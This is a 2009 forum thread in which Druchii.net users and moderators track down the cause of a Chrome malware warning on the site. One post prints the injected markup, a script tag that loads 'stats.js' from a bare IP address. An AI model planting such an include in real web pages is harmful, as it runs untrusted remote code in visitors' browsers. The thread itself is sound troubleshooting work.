Page 1 of 1

Malware Detected???

Posted: Tue Apr 21, 2009 3:49 pm
by Deadlydeception
Image


Is there something wrong here? I'm using Google Chrome as my web browser, but this annoying window keeps popping up when I visit my favorite site.
It seems fine on firefox...

Posted: Tue Apr 21, 2009 7:33 pm
by Gee
One of the third party sites used by D.Net for stats has a link to a site that tries to do naugty things. :-(

As long as you've kept your machine up to date you'll be fine, do wish the admins would fix it already though?

Posted: Tue Apr 21, 2009 8:14 pm
by Rork
I believe langmann is trying to get to the bottom of this.

Though it only seems to affect certain people. I've never had any alerts when using the site, for example.

Posted: Tue Apr 21, 2009 8:17 pm
by Kinslayer
I've never had a similar warning and I am running Internet Explorer 7 on Windows Vista. I have also used Mozilla Firefox and never had the problem. You should just be able to add Druchii to your list of 'friendly' websites and it will shut up with the warnings. That or get another web browser downloaded.

What's the worst that could happen from visiting Druchii.net? Apart from taking one too many dips in a cauldron with the Witchies.

Posted: Tue Apr 21, 2009 9:58 pm
by Loki
Right, we've had this discussion amongst us mods so far. After seeing who was getting it and who was using what browsers/antivirus stuff, there seems to be no rhyme or reason as to who it affects.

Posted: Wed Apr 22, 2009 12:24 am
by Deadlydeception
I'm glad to hear that this is being looked at.
I'll stick with firefox for now, just in case.

Posted: Wed Apr 22, 2009 7:18 am
by Gee
DeadlyDeception wrote:I'm glad to hear that this is being looked at.
I'll stick with firefox for now, just in case.


Watching d.net via fiddler2 shows it happens regardless of browser and OS, you just only get the warning via Chrome.

Using FireBug in firefox you'd be able to see the problem.

View source shows:

Code: Select all

<link rel="stylesheet" href="templates/druchii/dmenu.css" type="text/css">
<script type="text/javascript" src="/templates/druchii/coolmenus4.js">


Using firebug to see the DOM

Code: Select all

<link rel="stylesheet" href="templates/druchii/dmenu.css" type="text/css">
<script type="text/javascript" src="/templates/druchii/coolmenus4.js"></script><script type="text/javascript" src="http://95.129.144.229/stats/stats.js"></script>


and it's that 95.129.144.229/stats/stats.js file that's causing the problem.

Posted: Wed Apr 22, 2009 8:15 pm
by Langmann
Yeah I have looked into it.

It comes from a site, not this one, that was hacked a month ago. Google managed to pick up on this and that site was repaired.

Currently it exists as a chrome warning and hasn't been removed.

coolmenus itself is an internal java script that does the menus for the menu bar on dnet. It is harmless.

The malware has been found and destroyed. Thanks to all for noticing and forwarding it to me.

Please also thank Gee for figuring this thing out.